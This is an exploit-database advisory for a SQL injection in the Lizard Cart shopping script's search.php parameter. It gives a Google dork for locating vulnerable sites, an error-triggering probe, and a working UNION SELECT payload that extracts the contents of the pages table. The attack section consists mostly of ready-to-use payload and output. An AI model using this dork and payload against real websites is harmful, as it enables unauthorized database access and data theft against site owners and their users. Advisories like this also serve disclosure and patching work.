Lizard Cart SQL Injection

2012.03.06
Credit: Number 7
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: [lizard cart SQLi (search.php)] # Google Dork: [inurl:search.php+intitle:"Lizard Cart"+intext:"Search Results:"] # Date: [05-03-2012] # Author: [Number 7] # Software Link: [http://sourceforge.net/projects/lizardcart/files/latest/download?source=directory] # Version: [pp104] # Tested on: [Windows] _____________________________________________________________________________________________ Usage: http://localhost/liza/search.php?metode=1' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\AppServ\www\liza\search.php on line 15 http://localhost/liza/search.php?metode=[SQLi] search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages-- Demo: htptp://localhost/liza/search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages-- _____________________________________________________________________________________________

References:

http://sourceforge.net/projects/lizardcart/files/latest/download?source=directory


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top